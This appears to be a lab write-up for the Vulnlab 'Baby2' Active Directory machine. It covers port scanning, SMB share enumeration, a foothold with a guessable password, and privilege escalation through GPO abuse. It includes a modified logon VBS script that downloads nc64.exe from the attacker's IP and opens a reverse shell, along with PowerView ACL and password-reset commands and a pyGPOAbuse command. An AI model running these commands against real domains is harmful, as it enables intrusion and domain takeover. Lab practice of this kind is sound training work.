5.2 KiB
Vulnlab - Baby2
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-08 10:27:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open tcpwrapped
389/tcp open tcpwrapped
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.baby2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
| Issuer: commonName=baby2-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-22T17:39:15
| Not valid after: 2024-08-21T17:39:15
| MD5: 86833092b739d099392a9fba548ca41d
|_SHA-1: 595b9978c2e36c712b4875ff45b40efc72657d3f
445/tcp open tcpwrapped
3269/tcp open tcpwrapped
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.baby2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
| Issuer: commonName=baby2-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-22T17:39:15
| Not valid after: 2024-08-21T17:39:15
| MD5: 86833092b739d099392a9fba548ca41d
|_SHA-1: 595b9978c2e36c712b4875ff45b40efc72657d3f
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=dc.baby2.vl
Enumerating smb shares with null authentication
From `homes` share, we can find some directories for users
Also from apps share there's login.vbs.lnk
With kerbrute we can verify these users also check if pre-authentication is disabled for AS-REP roasting
From `NETLOGON` there's the login.vbs but it doesn't really seemed useful
Foothold (Amelia)
From the users, there's library which seems odd, on trying to login with the password library it shows that's a valid login
This user has READ access on SYSVOL share
Also running bloodhound to enumerate domain
python3 /opt/BloodHound.py/bloodhound.py -d 'baby2.vl' -u 'library' -p 'library' -c all -ns 10.10.105.23
This user didn't had any ACLs but running the shortest path to high value targets , members of LEGACY group has WriteDacl on GPOADM which further has GenericAll on Group Policy Object (GPO)
But for now we need to focus on logon script, even tho from the output of crackmapexec, it showed that we only have READ access on SYSVOL, we can still overwrite the login.vbs file from scripts folder, just point the network share to our IP
Have responder or smbserver ready and upload the file
On responder, we'll receive the NTLMv1 hash of Amelia
But I wasn't able to crack this hash, instead we can just modify the vbs script to get a reverse shell
Set oShell = CreateObject("Wscript.Shell")
oShell.run "cmd.exe /c curl 10.8.0.136/nc64.exe -o C:\Windows\Temp\nc64.exe"
oShell.run "cmd.exe /c C:\Windows\Temp\nc64.exe 10.8.0.136 2222 -e cmd.exe"
Check in which groups amelia belongs to
This account is a member of legacy group, meaning that we can abuse WriteDACL on GPOADM, with PowerView granting GenericAll on GPOADM
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "GPOADM" -PrincipalIdentity "Amelia.Griffiths" -Verbose
Now we can change the password for GPOADM
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity GPOADM -AccountPassword $UserPassword
Using pyGPOAbuse https://github.com/Hackndo/pyGPOAbuse, we can create immediate scheduled task which will get executed as SYSTEM user to add GPOADM in local administrators group (for this I had to use python virtual environment as some dependencies were causing an issue with the current impacket version), we'll need the GPO ID for creating the task
python3 pygpoabuse.py baby2.vl/GPOADM:'Password123!' -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" -command 'net localgroup administrators GPOADM /add' -f
Wait for few seconds for the created task to be executed, we'll see GPOADM being a part of administrators group
Now we can login through WinRM
